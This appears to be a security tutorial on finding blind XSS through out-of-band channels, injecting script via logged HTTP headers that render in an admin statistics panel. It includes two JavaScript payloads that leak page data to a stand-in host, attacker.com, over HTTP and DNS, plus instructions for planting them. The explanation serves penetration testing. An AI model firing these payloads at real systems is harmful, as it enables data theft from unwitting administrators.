
OoB Channel XSS Testing

Out-of-band (OoB) attacks are well known and have long been used to exploit SQL injection vulnerabilities. The idea is to make the vulnerable system issue an HTTP, DNS or similar request that carries the sensitive data to a server the attacker controls, so the data leaves through a channel the attacker can observe instead of through the application's own response.

Basic Info

When do we need OoB channels to test for XSS?

For SQL injection, OoB channels are most useful against totally blind injections, where there is no error message and no observable difference in the output.

XSS has an analogous case: when the tester cannot see the page on which the injected script is rendered, the bug is a blind XSS vulnerability.

Many blog and portal packages store parts of the request headers, such as HTTP_REFERER, HTTP_USER_AGENT and HTTP_X_FORWARDED_FOR, for statistics, and display them in their administrative panels.

The Problem

From an attacker's perspective this is a real problem when no input sanitization is done, because these header fields are entirely client-controlled and can be used for attacks such as:

1) SQL injection, which can occur when the header values are written to the database.

2) XSS, which can occur when the administrator views the referrer or user-agent statistics.

In this situation the SQL injection can still be found with the usual techniques, but the XSS cannot, because only the administrator ever sees the rendered payload. The basic test string - "<script>alert(1)</script>" - gives the tester no feedback and so cannot be used to find this kind of XSS.

This makes the attack particularly critical: the XSS fires in the administrator's browser, inside the administrator's session.

Exploiting Phase


To perform the attack, put the payload in the Referer and User-Agent headers (and X-Forwarded-For, if the application stores it too) of a request to the target, then wait for the HTTP, DNS or other callback to arrive at your server.

HTTP-channel javascript payload:

  var i = new Image();
  i.src = 'http://www.attacker.com/xss.php?data=' + window.location.href;

DNS-channel javascript payload:

  var i = new Image();
  var x = location.href;
  i.src = "http://" + x.substr(7, x.length-8) + ".attacker.com/";

The DNS payload relies on the browser resolving the hostname of the image URL: the lookup for <page-host>.attacker.com reaches the authoritative server for attacker.com even when the HTTP request itself is blocked. Note that substr(7, x.length-8) only strips a leading "http://" and a trailing "/", so it works for a bare origin such as http://victim.example/; a path, query string or port in location.href would produce characters that are not valid in a DNS label.

More advanced payloads with filter-bypass techniques can of course be built. The only remaining step is to wait for an administrator to view the site's referrer or user-agent statistics.

Thanks & Credits

Thanks Bedirhan Urgun for DNS-channel javascript payload.



